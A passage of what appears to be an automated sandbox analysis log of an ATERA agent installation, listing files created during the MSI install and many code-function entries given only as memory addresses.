                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6CA1.tmp-
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6CA1.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6CA1.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6CA1.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6CA1.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6CA1.tmp-\CustomAction.config
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageMonitoring.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageUpgradeAgent.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageOsUpdates.exe.log
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI77D8.tmp-
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI77D8.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI77D8.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI77D8.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI77D8.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI77D8.tmp-\CustomAction.config
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageInternalPoller.exe.log
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7BC1.tmp-
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7BC1.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7BC1.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7BC1.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7BC1.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7BC1.tmp-\CustomAction.config
                                Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI2E58.tmpJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_074F71D04_3_074F71D0
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_074F00404_3_074F0040
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_04FE50B85_3_04FE50B8
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_04FE59A85_3_04FE59A8
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_04FE4D685_3_04FE4D68
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 12_2_00007FFD9B3DC92212_2_00007FFD9B3DC922
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 12_2_00007FFD9B3DBB7612_2_00007FFD9B3DBB76
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFD9B43387016_2_00007FFD9B433870
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFD9B42C91016_2_00007FFD9B42C910
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFD9B421CE016_2_00007FFD9B421CE0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFD9B419AF216_2_00007FFD9B419AF2
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFD9B42900E16_2_00007FFD9B42900E
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFD9B62189516_2_00007FFD9B621895
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFD9B63373E16_2_00007FFD9B63373E
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFD9B62268416_2_00007FFD9B622684
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFD9B62470616_2_00007FFD9B624706
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFD9B410C7D16_2_00007FFD9B410C7D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFD9B62FC9D16_2_00007FFD9B62FC9D
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_3_069C004019_3_069C0040
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B4011BD20_2_00007FFD9B4011BD
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B3F795620_2_00007FFD9B3F7956
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B40211820_2_00007FFD9B402118
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B3F870220_2_00007FFD9B3F8702
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B41057D20_2_00007FFD9B41057D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B3F12FB20_2_00007FFD9B3F12FB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B4011D320_2_00007FFD9B4011D3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B400ED820_2_00007FFD9B400ED8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B3FBEE020_2_00007FFD9B3FBEE0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B3F16FA20_2_00007FFD9B3F16FA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B400DBA20_2_00007FFD9B400DBA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B3F11BD21_2_00007FFD9B3F11BD
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B3E795621_2_00007FFD9B3E7956
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B3F211821_2_00007FFD9B3F2118
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B3E870221_2_00007FFD9B3E8702
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B40057D21_2_00007FFD9B40057D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B3F11D321_2_00007FFD9B3F11D3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B3E120021_2_00007FFD9B3E1200
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B3F0ED821_2_00007FFD9B3F0ED8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B3E16FA21_2_00007FFD9B3E16FA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B3F0DBA21_2_00007FFD9B3F0DBA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 24_2_00007FFD9B3D195324_2_00007FFD9B3D1953
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 24_2_00007FFD9B3D16FA24_2_00007FFD9B3D16FA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 24_2_00007FFD9B3D120024_2_00007FFD9B3D1200
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B3F1F9426_2_00007FFD9B3F1F94
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B3ECE9026_2_00007FFD9B3ECE90
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B3ECD7026_2_00007FFD9B3ECD70
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B3F3CA026_2_00007FFD9B3F3CA0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B3E1D1026_2_00007FFD9B3E1D10
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B3E93F626_2_00007FFD9B3E93F6
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B5FA43D26_2_00007FFD9B5FA43D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B5F641026_2_00007FFD9B5F6410
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B5F6ED826_2_00007FFD9B5F6ED8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B5F664026_2_00007FFD9B5F6640
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B5F0E4E26_2_00007FFD9B5F0E4E
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B5E2E0526_2_00007FFD9B5E2E05
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B5F728826_2_00007FFD9B5F7288
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B5F97B126_2_00007FFD9B5F97B1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B5FCF3126_2_00007FFD9B5FCF31
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B5EF61D26_2_00007FFD9B5EF61D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B3D0C5826_2_00007FFD9B3D0C58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3F897629_2_00007FFD9B3F8976
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3F195329_2_00007FFD9B3F1953
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3F12FB29_2_00007FFD9B3F12FB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3FD1B429_2_00007FFD9B3FD1B4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B41E1D429_2_00007FFD9B41E1D4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3FD1E029_2_00007FFD9B3FD1E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3F972229_2_00007FFD9B3F9722
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3FC4D129_2_00007FFD9B3FC4D1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B4104F029_2_00007FFD9B4104F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3F3BF329_2_00007FFD9B3F3BF3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B42131D29_2_00007FFD9B42131D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3F16FA29_2_00007FFD9B3F16FA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 35_2_00007FFD9B3F174D35_2_00007FFD9B3F174D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 35_2_00007FFD9B402E5335_2_00007FFD9B402E53
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 35_2_00007FFD9B3F84C035_2_00007FFD9B3F84C0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 35_2_00007FFD9B3F528835_2_00007FFD9B3F5288
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 35_2_00007FFD9B3F531835_2_00007FFD9B3F5318
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 35_2_00007FFD9B401CA335_2_00007FFD9B401CA3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF190B88037_2_00007FFDF190B880
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF19C01E037_2_00007FFDF19C01E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF19B20E037_2_00007FFDF19B20E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF19B696037_2_00007FFDF19B6960
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF199320037_2_00007FFDF1993200
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18FF22037_2_00007FFDF18FF220
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF191917037_2_00007FFDF1919170
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18811B037_2_00007FFDF18811B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18EF1B037_2_00007FFDF18EF1B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF19B50F037_2_00007FFDF19B50F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF195F3E037_2_00007FFDF195F3E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF191B37037_2_00007FFDF191B370
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18A93D037_2_00007FFDF18A93D0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF191D35037_2_00007FFDF191D350
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF188F34037_2_00007FFDF188F340
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF188D28437_2_00007FFDF188D284
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF188D63437_2_00007FFDF188D634
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18CF63037_2_00007FFDF18CF630
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18EB64737_2_00007FFDF18EB647
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF189564037_2_00007FFDF1895640
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF188955C37_2_00007FFDF188955C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF188347437_2_00007FFDF1883474
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18874B037_2_00007FFDF18874B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF189D83037_2_00007FFDF189D830
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF19D184037_2_00007FFDF19D1840
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18CD77037_2_00007FFDF18CD770
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF19CF79037_2_00007FFDF19CF790
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18DF78037_2_00007FFDF18DF780
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18F36E037_2_00007FFDF18F36E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF192772037_2_00007FFDF1927720
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF192169037_2_00007FFDF1921690
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF19756D037_2_00007FFDF19756D0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18EB9F037_2_00007FFDF18EB9F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18AD91037_2_00007FFDF18AD910
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18E18DA37_2_00007FFDF18E18DA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18ABBE037_2_00007FFDF18ABBE0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF19C3C2037_2_00007FFDF19C3C20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF196DB8037_2_00007FFDF196DB80
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18C9BA037_2_00007FFDF18C9BA0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1923AF037_2_00007FFDF1923AF0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18E7B3037_2_00007FFDF18E7B30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18B9A6037_2_00007FFDF18B9A60
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1937A6037_2_00007FFDF1937A60
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18B5AD037_2_00007FFDF18B5AD0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18B3E1037_2_00007FFDF18B3E10
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1895E5037_2_00007FFDF1895E50
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18C9CF037_2_00007FFDF18C9CF0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1957D2037_2_00007FFDF1957D20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF195DCC037_2_00007FFDF195DCC0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF196BCD037_2_00007FFDF196BCD0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18DFEF037_2_00007FFDF18DFEF0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18B9F3037_2_00007FFDF18B9F30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1897F3037_2_00007FFDF1897F30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1915F2037_2_00007FFDF1915F20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18C7E7037_2_00007FFDF18C7E70
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1903EB037_2_00007FFDF1903EB0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF191FED037_2_00007FFDF191FED0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1935EA037_2_00007FFDF1935EA0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1927EA037_2_00007FFDF1927EA0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1887EC037_2_00007FFDF1887EC0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF193C22037_2_00007FFDF193C220
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18F224037_2_00007FFDF18F2240
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF190C11037_2_00007FFDF190C110
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF191A0C037_2_00007FFDF191A0C0
